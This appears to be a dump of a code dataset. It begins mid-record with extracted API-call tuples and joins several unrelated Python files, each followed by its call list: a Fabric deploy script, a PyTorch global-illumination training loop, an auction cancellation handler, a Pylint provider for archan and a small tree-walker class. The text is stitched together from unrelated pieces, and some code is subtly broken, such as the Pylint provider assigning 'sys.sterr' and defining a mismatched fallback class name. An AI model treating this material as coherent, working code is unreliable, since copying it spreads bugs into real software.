genome_build)\n', (5635, 5657), False, 'from genes.hgvs import get_hgvs_variant_tuple\n'), ((11583, 11603), 'library.utils.md5sum_str', 'md5sum_str', (['self.seq'], {}), '(self.seq)\n', (11593, 11603), False, 'from library.utils import md5sum_str\n'), ((12217, 12247), 're.match', 're.match', (['"""[^GATCN]"""', 'self.seq'], {}), "('[^GATCN]', self.seq)\n", (12225, 12247), False, 'import re\n'), ((13432, 13468), 'django.db.models.query_utils.Q', 'Q', ([], {'locus__contig__name__iexact': 'chrom'}), '(locus__contig__name__iexact=chrom)\n', (13433, 13468), False, 'from django.db.models.query_utils import Q, FilteredRelation\n'), ((13471, 13512), 'django.db.models.query_utils.Q', 'Q', ([], {'locus__contig__ucsc_name__iexact': 'chrom'}), '(locus__contig__ucsc_name__iexact=chrom)\n', (13472, 13512), False, 'from django.db.models.query_utils import Q, FilteredRelation\n'), ((13779, 13812), 'django.db.models.query_utils.Q', 'Q', ([], {'alt__seq': 'Variant.REFERENCE_ALT'}), '(alt__seq=Variant.REFERENCE_ALT)\n', (13780, 13812), False, 'from django.db.models.query_utils import Q, FilteredRelation\n'), ((14054, 14099), 'django.db.models.functions.Greatest', 'Greatest', (['"""locus__ref__length"""', '"""alt__length"""'], {}), "('locus__ref__length', 'alt__length')\n", (14062, 14099), False, 'from django.db.models.functions import Greatest\n'), ((23570, 23638), 'django.db.models.query_utils.FilteredRelation', 'FilteredRelation', (['"""variantcollectionrecord"""'], {'condition': 'vcr_condition'}), "('variantcollectionrecord', condition=vcr_condition)\n", (23586, 23638), False, 'from django.db.models.query_utils import Q, FilteredRelation\n'), ((5280, 5369), 'snpdb.models.models_dbsnp.DbSNP.get_for_variant', 'DbSNP.get_for_variant', (['va.variant', 'va.genome_build.latest_variant_annotation_version'], {}), 
'(va.variant, va.genome_build.\n latest_variant_annotation_version)\n', (5301, 5369), False, 'from snpdb.models.models_dbsnp import DbSNP\n'), ((14146, 14166), 'django.db.models.F', 'F', (['"""locus__position"""'], {}), "('locus__position')\n", (14147, 14166), False, 'from django.db.models import Value as V, QuerySet, F\n'), ((14169, 14190), 'django.db.models.F', 'F', (['"""longest_sequence"""'], {}), "('longest_sequence')\n", (14170, 14190), False, 'from django.db.models import Value as V, QuerySet, F\n'), ((14550, 14556), 'django.db.models.Value', 'V', (['""":"""'], {}), "(':')\n", (14551, 14556), True, 'from django.db.models import Value as V, QuerySet, F\n'), ((14626, 14632), 'django.db.models.Value', 'V', (['""" """'], {}), "(' ')\n", (14627, 14632), True, 'from django.db.models import Value as V, QuerySet, F\n'), ((14702, 14708), 'django.db.models.Value', 'V', (['""">"""'], {}), "('>')\n", (14703, 14708), True, 'from django.db.models import Value as V, QuerySet, F\n'), ((16825, 16861), 'snpdb.models.models_genome.GenomeBuild.builds_with_annotation', 'GenomeBuild.builds_with_annotation', ([], {}), '()\n', (16859, 16861), False, 'from snpdb.models.models_genome import Contig, GenomeBuild, GenomeBuildContig\n'), ((2747, 2767), 'snpdb.models.models_genome.GenomeBuild.grch37', 'GenomeBuild.grch37', ([], {}), '()\n', (2765, 2767), False, 'from snpdb.models.models_genome import Contig, GenomeBuild, GenomeBuildContig\n'), ((2964, 2984), 'snpdb.models.models_genome.GenomeBuild.grch38', 'GenomeBuild.grch38', ([], {}), '()\n', (2982, 2984), False, 'from snpdb.models.models_genome import Contig, GenomeBuild, GenomeBuildContig\n'), ((14784, 14795), 'django.db.models.fields.TextField', 'TextField', ([], {}), '()\n', (14793, 14795), False, 'from django.db.models.fields import TextField\n'), ((8017, 8164), 'logging.warning', 'logging.warning', (['"""VariantAllele exists with allele/build/variant of %s/%s/%s - deleting this one"""', 'va.allele', 'va.genome_build', 'va.variant'], {}), "(\n 'VariantAllele exists with allele/build/variant of %s/%s/%s - deleting this one'\n , va.allele, va.genome_build, va.variant)\n", (8032, 8164), False, 'import logging\n'), ((9020, 9040), 'snpdb.models.models_genome.GenomeBuild.grch37', 'GenomeBuild.grch37', ([], {}), '()\n', (9038, 9040), False, 'from snpdb.models.models_genome import Contig, GenomeBuild, GenomeBuildContig\n'), ((9111, 9131), 'snpdb.models.models_genome.GenomeBuild.grch38', 'GenomeBuild.grch38', ([], {}), '()\n', (9129, 9131), False, 'from snpdb.models.models_genome import Contig, GenomeBuild, GenomeBuildContig\n')] |
from fabric.decorators import task
from fabric.operations import run, sudo, local
from ConfigParser import ConfigParser
import geospatial
from fabric.context_managers import lcd
cp = ConfigParser()
cp.read('ocgis.cfg')
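# When configured as a local install, swap Fabric's remote run/cd/sudo for local equivalents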
if cp.get('install','location') == 'local':
run = local
cd = lcd
def lsudo(op):
local('sudo {0}'.format(op))
sudo = lsudo
SRC = cp.get('install','src')
INSTALL = cp.get('install','install')
J = cp.get('install','j')
@task(default=True)
def deploy():
# geospatial.install_hdf()
geospatial.install_netCDF4() | [
"ConfigParser.ConfigParser",
"geospatial.install_netCDF4",
"fabric.decorators.task"
] | [((184, 198), 'ConfigParser.ConfigParser', 'ConfigParser', ([], {}), '()\n', (196, 198), False, 'from ConfigParser import ConfigParser\n'), ((464, 482), 'fabric.decorators.task', 'task', ([], {'default': '(True)'}), '(default=True)\n', (468, 482), False, 'from fabric.decorators import task\n'), ((531, 559), 'geospatial.install_netCDF4', 'geospatial.install_netCDF4', ([], {}), '()\n', (557, 559), False, 'import geospatial\n')] |
import torch
import numpy as np
from torch.autograd import Variable
import torch.optim as optim
import argparse
import random
import os
import models
import torchvision.utils as vutils
import utils
import dataLoader
from torch.utils.data import DataLoader
parser = argparse.ArgumentParser()
# The location of the training set
parser.add_argument('--dataRoot', default='/home/zhl/SiggraphAsia18/Data/train/', help='path to images')
parser.add_argument('--experiment', default=None, help='the path to store samples and models')
# The basic training setting
parser.add_argument('--nepoch', type=int, default=18, help='the number of epochs for training')
parser.add_argument('--batchSize', type=int, default=16, help='input batch size')
parser.add_argument('--imageSize', type=int, default=256, help='the height / width of the input image to network')
parser.add_argument('--cuda', action='store_true', help='enables cuda')
parser.add_argument('--deviceIds', type=int, nargs='+', default=[0], help='the gpus used for training network')
# The training weight
parser.add_argument('--globalIllu2', type=float, default=1, help='the weight of global illumination prediction 2')
parser.add_argument('--globalIllu3', type=float, default=1, help='the weight of global illumination prediction 3')
# Fine Tune the network
parser.add_argument('--isFineTune', action = 'store_true', help='whether to fine-tune the network or not')
parser.add_argument('--epochId', type=int, default = -1, help='the training epoch of the network')
# The detail network setting
parser.add_argument('--cascadeLevel', type=int, default=0, help='how many levels of cascades we should use')
opt = parser.parse_args()
print(opt)
assert(opt.cascadeLevel == 0 )
if opt.experiment is None:
opt.experiment = 'check_globalillumination'
os.system('mkdir {0}'.format(opt.experiment) )
os.system('cp *.py %s' % opt.experiment )
g2W, g3W = opt.globalIllu2, opt.globalIllu3
opt.gpuId = opt.deviceIds[0]
opt.seed = random.randint(1, 10000)
print("Random Seed: ", opt.seed)
random.seed(opt.seed)
torch.manual_seed(opt.seed)
if torch.cuda.is_available() and not opt.cuda:
print("WARNING: You have a CUDA device, so you should probably run with --cuda")
####################################
# initialize tensors
albedoBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) )
normalBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) )
roughBatch = Variable(torch.FloatTensor(opt.batchSize, 1, opt.imageSize, opt.imageSize) )
segBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) )
depthBatch = Variable(torch.FloatTensor(opt.batchSize, 1, opt.imageSize, opt.imageSize) )
imP1Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) )
imP2Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) )
imP3Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) )
# Global illumination
globIllu1to2 = models.globalIllumination()
globIllu2to3 = models.globalIllumination()
#########################################
if opt.isFineTune:
globIllu1to2.load_state_dict(torch.load('{0}/globIllu1to2_{1}.pth'.format(opt.experiment, opt.epochId) ) )
globIllu2to3.load_state_dict(torch.load('{0}/globIllu2to3_{1}.pth'.format(opt.experiment, opt.epochId) ) )
####################################
# Send things into GPU
if opt.cuda:
albedoBatch = albedoBatch.cuda(opt.gpuId)
normalBatch = normalBatch.cuda(opt.gpuId)
roughBatch = roughBatch.cuda(opt.gpuId)
depthBatch = depthBatch.cuda(opt.gpuId)
segBatch = segBatch.cuda(opt.gpuId)
imP1Batch = imP1Batch.cuda(opt.gpuId)
imP2Batch = imP2Batch.cuda(opt.gpuId)
imP3Batch = imP3Batch.cuda(opt.gpuId)
globIllu1to2 = globIllu1to2.cuda(opt.gpuId)
globIllu2to3 = globIllu2to3.cuda(opt.gpuId)
####################################
####################################
# Global optimizers
opGlobalIllu1to2 = optim.Adam(globIllu1to2.parameters(), lr=2e-4, betas=(0.5, 0.999) )
opGlobalIllu2to3 = optim.Adam(globIllu2to3.parameters(), lr=2e-4, betas=(0.5, 0.999) )
#####################################
####################################
brdfDataset = dataLoader.BatchLoader(opt.dataRoot, imSize = opt.imageSize)
brdfLoader = DataLoader(brdfDataset, batch_size = opt.batchSize, num_workers = 8, shuffle = False)
j = 0
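# Per-iteration error logs; the initial np.ones row is a placeholder that later results are concatenated onto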
globalIllu1ErrsNpList= np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32)
globalIllu2ErrsNpList = np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32)
globalIllu3ErrsNpList= np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32)
renderedErrsNpList = np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32)
for epoch in list(range(opt.epochId+1, opt.nepoch) ):
trainingLog = open('{0}/trainingLog_{1}.txt'.format(opt.experiment, epoch), 'w')
for i, dataBatch in enumerate(brdfLoader):
j += 1
# Load data from cpu to gpu
albedo_cpu = dataBatch['albedo']
albedoBatch.data.resize_(albedo_cpu.shape)
albedoBatch.data.copy_(albedo_cpu )
normal_cpu = dataBatch['normal']
normalBatch.data.resize_(normal_cpu.shape)
normalBatch.data.copy_(normal_cpu )
rough_cpu = dataBatch['rough']
roughBatch.data.resize_(rough_cpu.shape)
roughBatch.data.copy_(rough_cpu )
seg_cpu = dataBatch['seg']
segBatch.data.resize_(seg_cpu.shape)
segBatch.data.copy_(seg_cpu )
depth_cpu = dataBatch['depth']
depthBatch.data.resize_(depth_cpu.shape)
depthBatch.data.copy_(depth_cpu )
imP1_cpu = dataBatch['imP1']
imP1Batch.data.resize_(imP1_cpu.shape)
imP1Batch.data.copy_(imP1_cpu )
imP2_cpu = dataBatch['imP2']
imP2Batch.data.resize_(imP2_cpu.shape)
imP2Batch.data.copy_(imP2_cpu )
imP3_cpu = dataBatch['imP3']
imP3Batch.data.resize_(imP3_cpu.shape)
imP3Batch.data.copy_(imP3_cpu )
opGlobalIllu1to2.zero_grad()
opGlobalIllu2to3.zero_grad()
########################################################
# Build the cascade network architecture #
globalIllu2s = []
globalIllu3s = []
n = 0
inputGlob2 = torch.cat([imP1Batch, albedoBatch,
normalBatch, roughBatch, depthBatch, segBatch], dim=1)
globalIllu2 = globIllu1to2(inputGlob2)
globalIllu2s.append(globalIllu2 )
inputGlob3 = torch.cat([globalIllu2s[n], albedoBatch,
normalBatch, roughBatch, depthBatch, segBatch], dim=1)
globalIllu3 = globIllu2to3(inputGlob3.detach() )
globalIllu3s.append(globalIllu3)
########################################################
globalIllu2Errs = []
globalIllu3Errs = []
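        # Masked MSE: squared error is restricted to foreground pixels (segBatch) and averaged over pixel count and the 3 channels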
pixelNum = torch.sum(segBatch ).cpu().data.item()
for m in range(0, n + 1):
globalIllu2Errs.append( torch.sum( (globalIllu2s[m] - imP2Batch)
* (globalIllu2s[m] - imP2Batch) * segBatch.expand_as(imP2Batch) ) / pixelNum / 3.0 )
globalIllu3Errs.append(torch.sum( (globalIllu3s[m] - imP3Batch)
* (globalIllu3s[m] - imP3Batch) * segBatch.expand_as(imP3Batch) ) / pixelNum / 3.0 )
globalIllu2ErrSum = sum(globalIllu2Errs)
globalIllu3ErrSum = sum(globalIllu3Errs)
totalErr = g2W * globalIllu2ErrSum + g3W * globalIllu3ErrSum
totalErr.backward()
opGlobalIllu1to2.step()
opGlobalIllu2to3.step()
# Output training error
utils.writeErrToScreen('globalIllu2', globalIllu2Errs, epoch, j)
utils.writeErrToScreen('globalIllu3', globalIllu3Errs, epoch, j)
utils.writeErrToFile('globalIllu2', globalIllu2Errs, trainingLog, epoch, j)
utils.writeErrToFile('globalIllu3', globalIllu3Errs, trainingLog, epoch, j)
globalIllu2ErrsNpList = np.concatenate( [globalIllu2ErrsNpList, utils.turnErrorIntoNumpy(globalIllu2Errs)], axis=0)
globalIllu3ErrsNpList = np.concatenate( [globalIllu3ErrsNpList, utils.turnErrorIntoNumpy(globalIllu3Errs)], axis=0)
if j < 1000:
utils.writeNpErrToScreen('globalIllu2_Accu:', np.mean(globalIllu2ErrsNpList[1:j+1, :], axis=0), epoch, j)
utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1, :], axis=0), epoch, j)
utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j)
utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j)
else:
utils.writeNpErrToScreen('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1, :], axis=0), epoch, j)
utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1, :], axis=0), epoch, j)
utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j)
utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j)
if j == 1 or j == 1000 or j% 2000 == 0:
# Save the ground truth and the input
vutils.save_image( (0.5*(albedoBatch + 1)*segBatch.expand_as(albedoBatch) ).data,
'{0}/{1}_albedoGt.png'.format(opt.experiment, j) )
vutils.save_image( (0.5*(normalBatch + 1)*segBatch.expand_as(normalBatch) ).data,
'{0}/{1}_normalGt.png'.format(opt.experiment, j) )
vutils.save_image( (0.5*(roughBatch + 1)*segBatch.expand_as(roughBatch) ).data,
'{0}/{1}_roughGt.png'.format(opt.experiment, j) )
depthOut = 1 / torch.clamp(depthBatch, 1e-6, 10) * segBatch.expand_as(depthBatch)
depthOut = (depthOut - 0.25) /0.8
vutils.save_image( ( depthOut*segBatch.expand_as(depthBatch) ).data,
'{0}/{1}_depthGt.png'.format(opt.experiment, j) )
vutils.save_image( ( ( 0.5*(imP1Batch + 1)*segBatch.expand_as(imP1Batch))**(1.0/2.2) ).data ,
'{0}/{1}_imP1.png'.format(opt.experiment, j) )
vutils.save_image( ( ( 0.5*(imP2Batch + 1)*segBatch.expand_as(imP2Batch))**(1.0/2.2) ).data ,
'{0}/{1}_imP2.png'.format(opt.experiment, j) )
vutils.save_image( ( ( 0.5*(imP3Batch + 1)*segBatch.expand_as(imP3Batch))**(1.0/2.2) ).data ,
'{0}/{1}_imP3.png'.format(opt.experiment, j) )
# Save the predicted results
for n in range(0, opt.cascadeLevel + 1):
vutils.save_image( ( ( 0.5*(globalIllu2s[n] + 1)*segBatch.expand_as(imP2Batch) )**(1.0/2.2) ).data,
'{0}/{1}_imP2Pred_{2}.png'.format(opt.experiment, j, n) )
vutils.save_image( ( ( 0.5*(globalIllu3s[n] + 1)*segBatch.expand_as(imP3Batch) )**(1.0/2.2) ).data,
'{0}/{1}_imP3Pred_{2}.png'.format(opt.experiment, j, n) )
trainingLog.close()
# Update the training rate
if (epoch + 1) % 2 == 0:
for param_group in opGlobalIllu1to2.param_groups:
param_group['lr'] /= 2
for param_group in opGlobalIllu2to3.param_groups:
param_group['lr'] /= 2
np.save('{0}/globalIllu2_{1}.npy'.format(opt.experiment, epoch), globalIllu2ErrsNpList )
np.save('{0}/globalIllu3_{1}.npy'.format(opt.experiment, epoch), globalIllu3ErrsNpList )
torch.save(globIllu1to2.state_dict(), '{0}/globIllu1to2_{1}.pth'.format(opt.experiment, epoch) )
torch.save(globIllu2to3.state_dict(), '{0}/globIllu2to3_{1}.pth'.format(opt.experiment, epoch) )
| [
"random.randint",
"argparse.ArgumentParser",
"torch.utils.data.DataLoader",
"torch.manual_seed",
"torch.FloatTensor",
"os.system",
"numpy.ones",
"torch.cat",
"models.globalIllumination",
"utils.writeErrToFile",
"utils.turnErrorIntoNumpy",
"numpy.mean",
"random.seed",
"torch.cuda.is_available",
"torch.clamp",
"utils.writeErrToScreen",
"dataLoader.BatchLoader",
"torch.sum"
] | [((266, 291), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (289, 291), False, 'import argparse\n'), ((1842, 1882), 'os.system', 'os.system', (["('cp *.py %s' % opt.experiment)"], {}), "('cp *.py %s' % opt.experiment)\n", (1851, 1882), False, 'import os\n'), ((1970, 1994), 'random.randint', 'random.randint', (['(1)', '(10000)'], {}), '(1, 10000)\n', (1984, 1994), False, 'import random\n'), ((2028, 2049), 'random.seed', 'random.seed', (['opt.seed'], {}), '(opt.seed)\n', (2039, 2049), False, 'import random\n'), ((2050, 2077), 'torch.manual_seed', 'torch.manual_seed', (['opt.seed'], {}), '(opt.seed)\n', (2067, 2077), False, 'import torch\n'), ((3026, 3053), 'models.globalIllumination', 'models.globalIllumination', ([], {}), '()\n', (3051, 3053), False, 'import models\n'), ((3069, 3096), 'models.globalIllumination', 'models.globalIllumination', ([], {}), '()\n', (3094, 3096), False, 'import models\n'), ((4260, 4318), 'dataLoader.BatchLoader', 'dataLoader.BatchLoader', (['opt.dataRoot'], {'imSize': 'opt.imageSize'}), '(opt.dataRoot, imSize=opt.imageSize)\n', (4282, 4318), False, 'import dataLoader\n'), ((4334, 4413), 'torch.utils.data.DataLoader', 'DataLoader', (['brdfDataset'], {'batch_size': 'opt.batchSize', 'num_workers': '(8)', 'shuffle': '(False)'}), '(brdfDataset, batch_size=opt.batchSize, num_workers=8, shuffle=False)\n', (4344, 4413), False, 'from torch.utils.data import DataLoader\n'), ((4450, 4502), 'numpy.ones', 'np.ones', (['[1, 1 + opt.cascadeLevel]'], {'dtype': 'np.float32'}), '([1, 1 + opt.cascadeLevel], dtype=np.float32)\n', (4457, 4502), True, 'import numpy as np\n'), ((4528, 4580), 'numpy.ones', 'np.ones', (['[1, 1 + opt.cascadeLevel]'], {'dtype': 'np.float32'}), '([1, 1 + opt.cascadeLevel], dtype=np.float32)\n', (4535, 4580), True, 'import numpy as np\n'), ((4605, 4657), 'numpy.ones', 'np.ones', (['[1, 1 + opt.cascadeLevel]'], {'dtype': 'np.float32'}), '([1, 1 + opt.cascadeLevel], dtype=np.float32)\n', (4612, 4657), True, 'import numpy as np\n'), ((4680, 4732), 'numpy.ones', 'np.ones', (['[1, 1 + opt.cascadeLevel]'], {'dtype': 'np.float32'}), '([1, 1 + opt.cascadeLevel], dtype=np.float32)\n', (4687, 4732), True, 'import numpy as np\n'), ((2082, 2107), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (2105, 2107), False, 'import torch\n'), ((2292, 2357), 'torch.FloatTensor', 'torch.FloatTensor', (['opt.batchSize', '(3)', 'opt.imageSize', 'opt.imageSize'], {}), '(opt.batchSize, 3, opt.imageSize, opt.imageSize)\n', (2309, 2357), False, 'import torch\n'), ((2384, 2449), 'torch.FloatTensor', 'torch.FloatTensor', (['opt.batchSize', '(3)', 'opt.imageSize', 'opt.imageSize'], {}), '(opt.batchSize, 3, opt.imageSize, opt.imageSize)\n', (2401, 2449), False, 'import torch\n'), ((2474, 2539), 'torch.FloatTensor', 'torch.FloatTensor', (['opt.batchSize', '(1)', 'opt.imageSize', 'opt.imageSize'], {}), '(opt.batchSize, 1, opt.imageSize, opt.imageSize)\n', (2491, 2539), False, 'import torch\n'), ((2562, 2627), 'torch.FloatTensor', 'torch.FloatTensor', (['opt.batchSize', '(3)', 'opt.imageSize', 'opt.imageSize'], {}), '(opt.batchSize, 3, opt.imageSize, opt.imageSize)\n', (2579, 2627), False, 'import torch\n'), ((2652, 2717), 'torch.FloatTensor', 'torch.FloatTensor', (['opt.batchSize', '(1)', 'opt.imageSize', 'opt.imageSize'], {}), '(opt.batchSize, 1, opt.imageSize, opt.imageSize)\n', (2669, 2717), False, 'import torch\n'), ((2742, 2807), 'torch.FloatTensor', 'torch.FloatTensor', (['opt.batchSize', '(3)', 'opt.imageSize', 'opt.imageSize'], {}), 
'(opt.batchSize, 3, opt.imageSize, opt.imageSize)\n', (2759, 2807), False, 'import torch\n'), ((2831, 2896), 'torch.FloatTensor', 'torch.FloatTensor', (['opt.batchSize', '(3)', 'opt.imageSize', 'opt.imageSize'], {}), '(opt.batchSize, 3, opt.imageSize, opt.imageSize)\n', (2848, 2896), False, 'import torch\n'), ((2920, 2985), 'torch.FloatTensor', 'torch.FloatTensor', (['opt.batchSize', '(3)', 'opt.imageSize', 'opt.imageSize'], {}), '(opt.batchSize, 3, opt.imageSize, opt.imageSize)\n', (2937, 2985), False, 'import torch\n'), ((6274, 6367), 'torch.cat', 'torch.cat', (['[imP1Batch, albedoBatch, normalBatch, roughBatch, depthBatch, segBatch]'], {'dim': '(1)'}), '([imP1Batch, albedoBatch, normalBatch, roughBatch, depthBatch,\n segBatch], dim=1)\n', (6283, 6367), False, 'import torch\n'), ((6486, 6585), 'torch.cat', 'torch.cat', (['[globalIllu2s[n], albedoBatch, normalBatch, roughBatch, depthBatch, segBatch]'], {'dim': '(1)'}), '([globalIllu2s[n], albedoBatch, normalBatch, roughBatch,\n depthBatch, segBatch], dim=1)\n', (6495, 6585), False, 'import torch\n'), ((7574, 7638), 'utils.writeErrToScreen', 'utils.writeErrToScreen', (['"""globalIllu2"""', 'globalIllu2Errs', 'epoch', 'j'], {}), "('globalIllu2', globalIllu2Errs, epoch, j)\n", (7596, 7638), False, 'import utils\n'), ((7647, 7711), 'utils.writeErrToScreen', 'utils.writeErrToScreen', (['"""globalIllu3"""', 'globalIllu3Errs', 'epoch', 'j'], {}), "('globalIllu3', globalIllu3Errs, epoch, j)\n", (7669, 7711), False, 'import utils\n'), ((7720, 7795), 'utils.writeErrToFile', 'utils.writeErrToFile', (['"""globalIllu2"""', 'globalIllu2Errs', 'trainingLog', 'epoch', 'j'], {}), "('globalIllu2', globalIllu2Errs, trainingLog, epoch, j)\n", (7740, 7795), False, 'import utils\n'), ((7804, 7879), 'utils.writeErrToFile', 'utils.writeErrToFile', (['"""globalIllu3"""', 'globalIllu3Errs', 'trainingLog', 'epoch', 'j'], {}), "('globalIllu3', globalIllu3Errs, trainingLog, epoch, j)\n", (7824, 7879), False, 'import utils\n'), ((7952, 7993), 'utils.turnErrorIntoNumpy', 'utils.turnErrorIntoNumpy', (['globalIllu2Errs'], {}), '(globalIllu2Errs)\n', (7976, 7993), False, 'import utils\n'), ((8076, 8117), 'utils.turnErrorIntoNumpy', 'utils.turnErrorIntoNumpy', (['globalIllu3Errs'], {}), '(globalIllu3Errs)\n', (8100, 8117), False, 'import utils\n'), ((8208, 8258), 'numpy.mean', 'np.mean', (['globalIllu2ErrsNpList[1:j + 1, :]'], {'axis': '(0)'}), '(globalIllu2ErrsNpList[1:j + 1, :], axis=0)\n', (8215, 8258), True, 'import numpy as np\n'), ((8325, 8375), 'numpy.mean', 'np.mean', (['globalIllu3ErrsNpList[1:j + 1, :]'], {'axis': '(0)'}), '(globalIllu3ErrsNpList[1:j + 1, :], axis=0)\n', (8332, 8375), True, 'import numpy as np\n'), ((8440, 8490), 'numpy.mean', 'np.mean', (['globalIllu2ErrsNpList[1:j + 1, :]'], {'axis': '(0)'}), '(globalIllu2ErrsNpList[1:j + 1, :], axis=0)\n', (8447, 8490), True, 'import numpy as np\n'), ((8568, 8618), 'numpy.mean', 'np.mean', (['globalIllu3ErrsNpList[1:j + 1, :]'], {'axis': '(0)'}), '(globalIllu3ErrsNpList[1:j + 1, :], axis=0)\n', (8575, 8618), True, 'import numpy as np\n'), ((8712, 8768), 'numpy.mean', 'np.mean', (['globalIllu2ErrsNpList[j - 999:j + 1, :]'], {'axis': '(0)'}), '(globalIllu2ErrsNpList[j - 999:j + 1, :], axis=0)\n', (8719, 8768), True, 'import numpy as np\n'), ((8833, 8889), 'numpy.mean', 'np.mean', (['globalIllu3ErrsNpList[j - 999:j + 1, :]'], {'axis': '(0)'}), '(globalIllu3ErrsNpList[j - 999:j + 1, :], axis=0)\n', (8840, 8889), True, 'import numpy as np\n'), ((8952, 9008), 'numpy.mean', 'np.mean', (['globalIllu2ErrsNpList[j - 
999:j + 1, :]'], {'axis': '(0)'}), '(globalIllu2ErrsNpList[j - 999:j + 1, :], axis=0)\n', (8959, 9008), True, 'import numpy as np\n'), ((9084, 9140), 'numpy.mean', 'np.mean', (['globalIllu3ErrsNpList[j - 999:j + 1, :]'], {'axis': '(0)'}), '(globalIllu3ErrsNpList[j - 999:j + 1, :], axis=0)\n', (9091, 9140), True, 'import numpy as np\n'), ((9780, 9814), 'torch.clamp', 'torch.clamp', (['depthBatch', '(1e-06)', '(10)'], {}), '(depthBatch, 1e-06, 10)\n', (9791, 9814), False, 'import torch\n'), ((6835, 6854), 'torch.sum', 'torch.sum', (['segBatch'], {}), '(segBatch)\n', (6844, 6854), False, 'import torch\n')] |
from openprocurement.auctions.core.utils import (
log_auction_status_change
)
from openprocurement.auctions.geb.constants import (
AUCTION_STATUSES_FOR_CLEAN_BIDS_IN_CANCELLATION
)
from openprocurement.auctions.geb.managers.changers.base import (
BaseAction
)
class CancellationActivationAction(BaseAction):
"""
Cancellation Activation action
when auction owner activate cancellation (patch status to 'active'):
- auction.status will set to 'cancelled'
- if procedure in statuses ['active.tendering', 'active.enquiry', 'active.auction']
delete all bids
"""
validators = []
@classmethod
def demand(cls, request, context):
"""
        Constructor method. If the request is a reason for this action,
        this method returns the action class.
"""
# check if patch is for activating cancellation
new_status = request.validated['json_data'].get('status')
if context.status == 'pending' and new_status == 'active':
return cls
return False
def act(self):
auction = self.request.auction
# pendify auction status
status = 'cancelled'
auction.status = status
log_auction_status_change(self.request, self.context, status)
# clean bids after cancellation procedure
auction_status = self.request.validated['auction_src']['status']
if auction_status in AUCTION_STATUSES_FOR_CLEAN_BIDS_IN_CANCELLATION:
auction.bids = []
| [
"openprocurement.auctions.core.utils.log_auction_status_change"
] | [((1212, 1273), 'openprocurement.auctions.core.utils.log_auction_status_change', 'log_auction_status_change', (['self.request', 'self.context', 'status'], {}), '(self.request, self.context, status)\n', (1237, 1273), False, 'from openprocurement.auctions.core.utils import log_auction_status_change\n')] |
import sys
try:
from archan import Provider, Argument, DomainMappingMatrix, Logger
from pylint.lint import Run
class LoggerWriter:
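        # File-like shim: forwards write() calls to a logging method so that
        # Pylint's console output is captured by the provider's logger.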
def __init__(self, level):
self.level = level
def write(self, message):
if message != '\n':
self.level('from pylint: ' + message)
class PylintProvider(Provider):
"""Pylint provider for Archan."""
identifier = 'archan_pylint.PylintProvider'
name = 'Pylint Provider: Issues per Module'
description = 'Number of Pylint messages per module.'
argument_list = (
Argument('pylint_args', list, 'Pylint arguments as a list.'),
)
def get_data(self, pylint_args=None):
"""
Provide matrix data for Pylint messages in a set of packages.
Args:
pylint_args (list): the arguments to pass to Pylint.
            Returns:
                archan.DomainMappingMatrix: Pylint message counts per module.
"""
logger = Logger.get_logger(__name__)
pylint_args = pylint_args or []
sys.stdout = LoggerWriter(logger.debug)
sys.stderr = LoggerWriter(logger.warning)
try:
run = Run(pylint_args, do_exit=False)
except TypeError:
run = Run(pylint_args, exit=False)
sys.stdout = sys.__stdout__
sys.sterr = sys.__stderr__
entities = []
data = []
for k, v in run.linter.stats['by_module'].items():
entities.append(k)
data.append([sum(v.values())])
entities.append('Messages')
return DomainMappingMatrix(data=data, entities=entities)
except ImportError:
class PyLintProvider:
"""Empty provider, please install Archan and Pylint."""
| [
"archan.DomainMappingMatrix",
"archan.Logger.get_logger",
"pylint.lint.Run",
"archan.Argument"
] | [((619, 679), 'archan.Argument', 'Argument', (['"""pylint_args"""', 'list', '"""Pylint arguments as a list."""'], {}), "('pylint_args', list, 'Pylint arguments as a list.')\n", (627, 679), False, 'from archan import Provider, Argument, DomainMappingMatrix, Logger\n'), ((1093, 1120), 'archan.Logger.get_logger', 'Logger.get_logger', (['__name__'], {}), '(__name__)\n', (1110, 1120), False, 'from archan import Provider, Argument, DomainMappingMatrix, Logger\n'), ((1759, 1808), 'archan.DomainMappingMatrix', 'DomainMappingMatrix', ([], {'data': 'data', 'entities': 'entities'}), '(data=data, entities=entities)\n', (1778, 1808), False, 'from archan import Provider, Argument, DomainMappingMatrix, Logger\n'), ((1312, 1343), 'pylint.lint.Run', 'Run', (['pylint_args'], {'do_exit': '(False)'}), '(pylint_args, do_exit=False)\n', (1315, 1343), False, 'from pylint.lint import Run\n'), ((1396, 1424), 'pylint.lint.Run', 'Run', (['pylint_args'], {'exit': '(False)'}), '(pylint_args, exit=False)\n', (1399, 1424), False, 'from pylint.lint import Run\n')] |
# Copyright (C) 2019 Intel Corporation
# SPDX-License-Identifier: BSD-3-Clause
import logging
import collections
log = logging.getLogger('codebasin')
class TreeWalker():
"""
Generic tree walker class.
"""
def __init__(self, _tree, _node_associations):
self.tree = _tree
self._node_associations = _node_associations
| [
"logging.getLogger"
] | [((121, 151), 'logging.getLogger', 'logging.getLogger', (['"""codebasin"""'], {}), "('codebasin')\n", (138, 151), False, 'import logging\n')] |
